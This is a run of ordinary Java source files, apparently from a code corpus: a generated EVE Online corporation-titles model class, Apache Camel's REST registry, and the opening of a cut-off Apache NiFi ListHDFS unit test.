HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
RolesAtOtherEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static RolesAtOtherEnum fromValue(String text) {
for (RolesAtOtherEnum b : RolesAtOtherEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("roles_at_other")
private List<RolesAtOtherEnum> rolesAtOther = new ArrayList<RolesAtOtherEnum>();
@JsonProperty("title_id")
private Integer titleId = null;
public CorporationTitlesResponse grantableRoles(List<GrantableRolesEnum> grantableRoles) {
this.grantableRoles = grantableRoles;
return this;
}
public CorporationTitlesResponse addGrantableRolesItem(GrantableRolesEnum grantableRolesItem) {
this.grantableRoles.add(grantableRolesItem);
return this;
}
/**
* grantable_roles array
*
* @return grantableRoles
**/
@ApiModelProperty(example = "null", value = "grantable_roles array")
public List<GrantableRolesEnum> getGrantableRoles() {
return grantableRoles;
}
public void setGrantableRoles(List<GrantableRolesEnum> grantableRoles) {
this.grantableRoles = grantableRoles;
}
public CorporationTitlesResponse grantableRolesAtBase(List<GrantableRolesAtBaseEnum> grantableRolesAtBase) {
this.grantableRolesAtBase = grantableRolesAtBase;
return this;
}
public CorporationTitlesResponse addGrantableRolesAtBaseItem(GrantableRolesAtBaseEnum grantableRolesAtBaseItem) {
this.grantableRolesAtBase.add(grantableRolesAtBaseItem);
return this;
}
/**
* grantable_roles_at_base array
*
* @return grantableRolesAtBase
**/
@ApiModelProperty(example = "null", value = "grantable_roles_at_base array")
public List<GrantableRolesAtBaseEnum> getGrantableRolesAtBase() {
return grantableRolesAtBase;
}
public void setGrantableRolesAtBase(List<GrantableRolesAtBaseEnum> grantableRolesAtBase) {
this.grantableRolesAtBase = grantableRolesAtBase;
}
public CorporationTitlesResponse grantableRolesAtHq(List<GrantableRolesAtHqEnum> grantableRolesAtHq) {
this.grantableRolesAtHq = grantableRolesAtHq;
return this;
}
public CorporationTitlesResponse addGrantableRolesAtHqItem(GrantableRolesAtHqEnum grantableRolesAtHqItem) {
this.grantableRolesAtHq.add(grantableRolesAtHqItem);
return this;
}
/**
* grantable_roles_at_hq array
*
* @return grantableRolesAtHq
**/
@ApiModelProperty(example = "null", value = "grantable_roles_at_hq array")
public List<GrantableRolesAtHqEnum> getGrantableRolesAtHq() {
return grantableRolesAtHq;
}
public void setGrantableRolesAtHq(List<GrantableRolesAtHqEnum> grantableRolesAtHq) {
this.grantableRolesAtHq = grantableRolesAtHq;
}
public CorporationTitlesResponse grantableRolesAtOther(List<GrantableRolesAtOtherEnum> grantableRolesAtOther) {
this.grantableRolesAtOther = grantableRolesAtOther;
return this;
}
public CorporationTitlesResponse addGrantableRolesAtOtherItem(GrantableRolesAtOtherEnum grantableRolesAtOtherItem) {
this.grantableRolesAtOther.add(grantableRolesAtOtherItem);
return this;
}
/**
* grantable_roles_at_other array
*
* @return grantableRolesAtOther
**/
@ApiModelProperty(example = "null", value = "grantable_roles_at_other array")
public List<GrantableRolesAtOtherEnum> getGrantableRolesAtOther() {
return grantableRolesAtOther;
}
public void setGrantableRolesAtOther(List<GrantableRolesAtOtherEnum> grantableRolesAtOther) {
this.grantableRolesAtOther = grantableRolesAtOther;
}
public CorporationTitlesResponse name(String name) {
this.name = name;
return this;
}
/**
* name string
*
* @return name
**/
@ApiModelProperty(example = "null", value = "name string")
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public CorporationTitlesResponse roles(List<RolesEnum> roles) {
this.roles = roles;
return this;
}
public CorporationTitlesResponse addRolesItem(RolesEnum rolesItem) {
this.roles.add(rolesItem);
return this;
}
/**
* roles array
*
* @return roles
**/
@ApiModelProperty(example = "null", value = "roles array")
public List<RolesEnum> getRoles() {
return roles;
}
public void setRoles(List<RolesEnum> roles) {
this.roles = roles;
}
public CorporationTitlesResponse rolesAtBase(List<RolesAtBaseEnum> rolesAtBase) {
this.rolesAtBase = rolesAtBase;
return this;
}
public CorporationTitlesResponse addRolesAtBaseItem(RolesAtBaseEnum rolesAtBaseItem) {
this.rolesAtBase.add(rolesAtBaseItem);
return this;
}
/**
* roles_at_base array
*
* @return rolesAtBase
**/
@ApiModelProperty(example = "null", value = "roles_at_base array")
public List<RolesAtBaseEnum> getRolesAtBase() {
return rolesAtBase;
}
public void setRolesAtBase(List<RolesAtBaseEnum> rolesAtBase) {
this.rolesAtBase = rolesAtBase;
}
public CorporationTitlesResponse rolesAtHq(List<RolesAtHqEnum> rolesAtHq) {
this.rolesAtHq = rolesAtHq;
return this;
}
public CorporationTitlesResponse addRolesAtHqItem(RolesAtHqEnum rolesAtHqItem) {
this.rolesAtHq.add(rolesAtHqItem);
return this;
}
/**
* roles_at_hq array
*
* @return rolesAtHq
**/
@ApiModelProperty(example = "null", value = "roles_at_hq array")
public List<RolesAtHqEnum> getRolesAtHq() {
return rolesAtHq;
}
public void setRolesAtHq(List<RolesAtHqEnum> rolesAtHq) {
this.rolesAtHq = rolesAtHq;
}
public CorporationTitlesResponse rolesAtOther(List<RolesAtOtherEnum> rolesAtOther) {
this.rolesAtOther = rolesAtOther;
return this;
}
public CorporationTitlesResponse addRolesAtOtherItem(RolesAtOtherEnum rolesAtOtherItem) {
this.rolesAtOther.add(rolesAtOtherItem);
return this;
}
/**
* roles_at_other array
*
* @return rolesAtOther
**/
@ApiModelProperty(example = "null", value = "roles_at_other array")
public List<RolesAtOtherEnum> getRolesAtOther() {
return rolesAtOther;
}
public void setRolesAtOther(List<RolesAtOtherEnum> rolesAtOther) {
this.rolesAtOther = rolesAtOther;
}
public CorporationTitlesResponse titleId(Integer titleId) {
this.titleId = titleId;
return this;
}
/**
* title_id integer
*
* @return titleId
**/
@ApiModelProperty(example = "null", value = "title_id integer")
public Integer getTitleId() {
return titleId;
}
public void setTitleId(Integer titleId) {
this.titleId = titleId;
}
@Override
public boolean equals(java.lang.Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
CorporationTitlesResponse corporationTitlesResponse = (CorporationTitlesResponse) o;
return Objects.equals(this.grantableRoles, corporationTitlesResponse.grantableRoles)
&& Objects.equals(this.grantableRolesAtBase, corporationTitlesResponse.grantableRolesAtBase)
&& Objects.equals(this.grantableRolesAtHq, corporationTitlesResponse.grantableRolesAtHq)
&& Objects.equals(this.grantableRolesAtOther, corporationTitlesResponse.grantableRolesAtOther)
&& Objects.equals(this.name, corporationTitlesResponse.name)
&& Objects.equals(this.roles, corporationTitlesResponse.roles)
&& Objects.equals(this.rolesAtBase, corporationTitlesResponse.rolesAtBase)
&& Objects.equals(this.rolesAtHq, corporationTitlesResponse.rolesAtHq)
&& Objects.equals(this.rolesAtOther, corporationTitlesResponse.rolesAtOther)
&& Objects.equals(this.titleId, corporationTitlesResponse.titleId);
}
@Override
public int hashCode() {
return Objects.hash(grantableRoles, grantableRolesAtBase, grantableRolesAtHq, grantableRolesAtOther, name,
roles, rolesAtBase, rolesAtHq, rolesAtOther, titleId);
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("class CorporationTitlesResponse {\n");
sb.append(" grantableRoles: ").append(toIndentedString(grantableRoles)).append("\n");
sb.append(" grantableRolesAtBase: ").append(toIndentedString(grantableRolesAtBase)).append("\n");
sb.append(" grantableRolesAtHq: ").append(toIndentedString(grantableRolesAtHq)).append("\n");
sb.append(" grantableRolesAtOther: ").append(toIndentedString(grantableRolesAtOther)).append("\n");
sb.append(" name: ").append(toIndentedString(name)).append("\n");
sb.append(" roles: ").append(toIndentedString(roles)).append("\n");
sb.append(" rolesAtBase: ").append(toIndentedString(rolesAtBase)).append("\n");
sb.append(" rolesAtHq: ").append(toIndentedString(rolesAtHq)).append("\n");
sb.append(" rolesAtOther: ").append(toIndentedString(rolesAtOther)).append("\n");
sb.append(" titleId: ").append(toIndentedString(titleId)).append("\n");
sb.append("}");
return sb.toString();
}
/**
* Convert the given object to string with each line indented by 4 spaces
* (except the first line).
*/
private String toIndentedString(java.lang.Object o) {
if (o == null) {
return "null";
}
return o.toString().replace("\n", "\n ");
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.impl;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.apache.camel.CamelContext;
import org.apache.camel.CamelContextAware;
import org.apache.camel.Consumer;
import org.apache.camel.Endpoint;
import org.apache.camel.Exchange;
import org.apache.camel.Producer;
import org.apache.camel.Route;
import org.apache.camel.RuntimeCamelException;
import org.apache.camel.Service;
import org.apache.camel.ServiceStatus;
import org.apache.camel.StatefulService;
import org.apache.camel.StaticService;
import org.apache.camel.component.rest.RestApiEndpoint;
import org.apache.camel.component.rest.RestEndpoint;
import org.apache.camel.spi.RestConfiguration;
import org.apache.camel.spi.RestRegistry;
import org.apache.camel.support.LifecycleStrategySupport;
import org.apache.camel.support.service.ServiceSupport;
import org.apache.camel.util.ObjectHelper;
public class DefaultRestRegistry extends ServiceSupport implements StaticService, RestRegistry, CamelContextAware {
private CamelContext camelContext;
private final Map<Consumer, RestService> registry = new LinkedHashMap<>();
private transient Producer apiProducer;
public void addRestService(Consumer consumer, String url, String baseUrl, String basePath, String uriTemplate, String method,
String consumes, String produces, String inType, String outType, String routeId, String description) {
RestServiceEntry entry = new RestServiceEntry(consumer, url, baseUrl, basePath, uriTemplate, method, consumes, produces, inType, outType, routeId, description);
registry.put(consumer, entry);
}
public void removeRestService(Consumer consumer) {
registry.remove(consumer);
}
@Override
public List<RestRegistry.RestService> listAllRestServices() {
return new ArrayList<>(registry.values());
}
@Override
public int size() {
return registry.size();
}
@Override
public String apiDocAsJson() {
// see if there is a rest-api endpoint which would be the case if rest api-doc has been explicit enabled
if (apiProducer == null) {
Endpoint restApiEndpoint = null;
Endpoint restEndpoint = null;
for (Map.Entry<String, Endpoint> entry : camelContext.getEndpointMap().entrySet()) {
String uri = entry.getKey();
if (uri.startsWith("rest-api:")) {
restApiEndpoint = entry.getValue();
break;
} else if (restEndpoint == null && uri.startsWith("rest:")) {
restEndpoint = entry.getValue();
}
}
if (restApiEndpoint == null && restEndpoint != null) {
// no rest-api has been explicit enabled, then we need to create it first
RestEndpoint rest = (RestEndpoint) restEndpoint;
String componentName = rest.getComponentName();
if (componentName != null) {
RestConfiguration config = camelContext.getRestConfiguration(componentName, true);
String apiComponent = config.getApiComponent() != null ? config.getApiComponent() : RestApiEndpoint.DEFAULT_API_COMPONENT_NAME;
String path = config.getApiContextPath() != null ? config.getApiContextPath() : "api-doc";
restApiEndpoint = camelContext.getEndpoint(String.format("rest-api:%s/%s?componentName=%s&apiComponentName=%s&contextIdPattern=#name#",
path, camelContext.getName(), componentName, apiComponent));
}
}
if (restApiEndpoint != null) {
// reuse the producer to avoid creating it
try {
apiProducer = restApiEndpoint.createProducer();
camelContext.addService(apiProducer, true);
} catch (Exception e) {
throw RuntimeCamelException.wrapRuntimeCamelException(e);
}
}
}
if (apiProducer != null) {
try {
Exchange dummy = apiProducer.getEndpoint().createExchange();
apiProducer.process(dummy);
String json = dummy.hasOut() ? dummy.getOut().getBody(String.class) : dummy.getIn().getBody(String.class);
return json;
} catch (Exception e) {
throw RuntimeCamelException.wrapRuntimeCamelException(e);
}
}
return null;
}
public CamelContext getCamelContext() {
return camelContext;
}
public void setCamelContext(CamelContext camelContext) {
this.camelContext = camelContext;
}
@Override
protected void doStart() throws Exception {
ObjectHelper.notNull(camelContext, "camelContext", this);
// add a lifecycle so we can keep track when consumers is being removed, so we can unregister them from our registry
camelContext.addLifecycleStrategy(new RemoveRestServiceLifecycleStrategy());
}
@Override
protected void doStop() throws Exception {
registry.clear();
}
/**
* Represents a rest service
*/
private final class RestServiceEntry implements RestService {
private final Consumer consumer;
private final String url;
private final String baseUrl;
private final String basePath;
private final String uriTemplate;
private final String method;
private final String consumes;
private final String produces;
private final String inType;
private final String outType;
private final String routeId;
private final String description;
private RestServiceEntry(Consumer consumer, String url, String baseUrl, String basePath, String uriTemplate, String method,
String consumes, String produces, String inType, String outType, String routeId, String description) {
this.consumer = consumer;
this.url = url;
this.baseUrl = baseUrl;
this.basePath = basePath;
this.uriTemplate = uriTemplate;
this.method = method;
this.consumes = consumes;
this.produces = produces;
this.inType = inType;
this.outType = outType;
this.routeId = routeId;
this.description = description;
}
public Consumer getConsumer() {
return consumer;
}
public String getUrl() {
return url;
}
public String getBaseUrl() {
return baseUrl;
}
public String getBasePath() {
return basePath;
}
public String getUriTemplate() {
return uriTemplate;
}
public String getMethod() {
return method;
}
public String getConsumes() {
return consumes;
}
public String getProduces() {
return produces;
}
public String getInType() {
return inType;
}
public String getOutType() {
return outType;
}
public String getState() {
// must use String type to be sure remote JMX can read the attribute without requiring Camel classes.
ServiceStatus status = null;
if (consumer instanceof StatefulService) {
status = ((StatefulService) consumer).getStatus();
}
// if no status exists then its stopped
if (status == null) {
status = ServiceStatus.Stopped;
}
return status.name();
}
public String getRouteId() {
return routeId;
}
public String getDescription() {
return description;
}
}
/**
* A {@link org.apache.camel.spi.LifecycleStrategy} that keeps track when a {@link Consumer} is removed
* and automatic un-register it from this REST registry.
*/
private final class RemoveRestServiceLifecycleStrategy extends LifecycleStrategySupport {
@Override
public void onServiceRemove(CamelContext context, Service service, Route route) {
super.onServiceRemove(context, service, route);
// if its a consumer then de-register it from the rest registry
if (service instanceof Consumer) {
removeRestService((Consumer) service);
}
}
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.nifi.processors.hadoop;
import static org.apache.nifi.processors.hadoop.ListHDFS.FILTER_DIRECTORIES_AND_FILES_VALUE;
import static org.apache.nifi.processors.hadoop.ListHDFS.FILTER_FILES_ONLY_VALUE;
import static org.apache.nifi.processors.hadoop.ListHDFS.FILTER_FULL_PATH_VALUE;
import static org.junit.Assert.assertEquals;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.net.URI;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentMap;
import java.util.concurrent.TimeUnit;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.util.Progressable;
import org.apache.nifi.components.state.Scope;
import org.apache.nifi.controller.AbstractControllerService;
import org.apache.nifi.distributed.cache.client.Deserializer;
import org.apache.nifi.distributed.cache.client.DistributedMapCacheClient;
import org.apache.nifi.distributed.cache.client.Serializer;
import org.apache.nifi.hadoop.KerberosProperties;
import org.apache.nifi.reporting.InitializationException;
import org.apache.nifi.util.MockFlowFile;
import org.apache.nifi.util.NiFiProperties;
import org.apache.nifi.util.TestRunner;
import org.apache.nifi.util.TestRunners;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class TestListHDFS {
private TestRunner runner;
private ListHDFSWithMockedFileSystem proc;
private NiFiProperties mockNiFiProperties;
private KerberosProperties kerberosProperties;
@Before
public void setup() throws InitializationException {
mockNiFiProperties = mock(NiFiProperties.class);
when(mockNiFiProperties.getKerberosConfigurationFile()).thenReturn(null);
kerberosProperties = new KerberosProperties(null);
proc = new ListHDFSWithMockedFileSystem(kerberosProperties);
runner = TestRunners.newTestRunner(proc);
runner.setProperty(ListHDFS.HADOOP_CONFIGURATION_RESOURCES, "src/test/resources/core-site.xml");
runner.setProperty(ListHDFS.DIRECTORY, "/test");
}
@Test
public void testListingWithValidELFunction() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
runner.setProperty(ListHDFS.DIRECTORY, "${literal('/test'):substring(0,5)}");
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
final MockFlowFile mff = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0);
mff.assertAttributeEquals("path", "/test");
mff.assertAttributeEquals("filename", "testFile.txt");
}
@Test
public void testListingWithFilter() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
runner.setProperty(ListHDFS.DIRECTORY, "${literal('/test'):substring(0,5)}");
runner.setProperty(ListHDFS.FILE_FILTER, "[^test].*");
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
}
@Test
public void testListingWithInvalidELFunction() throws InterruptedException {
runner.setProperty(ListHDFS.DIRECTORY, "${literal('/test'):foo()}");
runner.assertNotValid();
}
@Test
public void testListingWithUnrecognizedELFunction() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
runner.setProperty(ListHDFS.DIRECTORY, "data_${literal('testing'):substring(0,4)%7D");
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
}
@Test
public void testListingHasCorrectAttributes() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
final MockFlowFile mff = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0);
mff.assertAttributeEquals("path", "/test");
mff.assertAttributeEquals("filename", "testFile.txt");
}
@Test
public void testRecursiveWithDefaultFilterAndFilterMode() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/.testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
final List<MockFlowFile> flowFiles = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS);
for (int i=0; i < 2; i++) {
final MockFlowFile ff = flowFiles.get(i);
final String filename = ff.getAttribute("filename");
if (filename.equals("testFile.txt")) {
ff.assertAttributeEquals("path", "/test");
} else if ( filename.equals("1.txt")) {
ff.assertAttributeEquals("path", "/test/testDir");
} else {
Assert.fail("filename was " + filename);
}
}
}
@Test
public void testRecursiveWithCustomFilterDirectoriesAndFiles() throws InterruptedException, IOException {
// set custom regex filter and filter mode
runner.setProperty(ListHDFS.FILE_FILTER, ".*txt.*");
runner.setProperty(ListHDFS.FILE_FILTER_MODE, FILTER_DIRECTORIES_AND_FILES_VALUE.getValue());
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.out")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.out")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/txtDir")));
proc.fileSystem.addFileStatus(new Path("/test/txtDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/txtDir/3.out")));
proc.fileSystem.addFileStatus(new Path("/test/txtDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/txtDir/3.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
final List<MockFlowFile> flowFiles = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS);
for (int i = 0; i < 2; i++) {
final MockFlowFile ff = flowFiles.get(i);
final String filename = ff.getAttribute("filename");
if (filename.equals("testFile.txt")) {
ff.assertAttributeEquals("path", "/test");
} else if (filename.equals("3.txt")) {
ff.assertAttributeEquals("path", "/test/txtDir");
} else {
Assert.fail("filename was " + filename);
}
}
}
@Test
public void testRecursiveWithCustomFilterFilesOnly() throws InterruptedException, IOException {
// set custom regex filter and filter mode
runner.setProperty(ListHDFS.FILE_FILTER, "[^\\.].*\\.txt");
runner.setProperty(ListHDFS.FILE_FILTER_MODE, FILTER_FILES_ONLY_VALUE.getValue());
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.out")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/.partfile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.out")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 3);
final List<MockFlowFile> flowFiles = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS);
for (int i = 0; i < 2; i++) {
final MockFlowFile ff = flowFiles.get(i);
final String filename = ff.getAttribute("filename");
if (filename.equals("testFile.txt")) {
ff.assertAttributeEquals("path", "/test");
} else if (filename.equals("1.txt")) {
ff.assertAttributeEquals("path", "/test/testDir");
} else if (filename.equals("2.txt")) {
ff.assertAttributeEquals("path", "/test/testDir/anotherDir");
} else {
Assert.fail("filename was " + filename);
}
}
}
@Test
public void testRecursiveWithCustomFilterFullPath() throws InterruptedException, IOException {
// set custom regex filter and filter mode
runner.setProperty(ListHDFS.FILE_FILTER, "(/.*/)*anotherDir/1\\..*");
runner.setProperty(ListHDFS.FILE_FILTER_MODE, FILTER_FULL_PATH_VALUE.getValue());
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.out")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/1.out")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.out")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/someDir")));
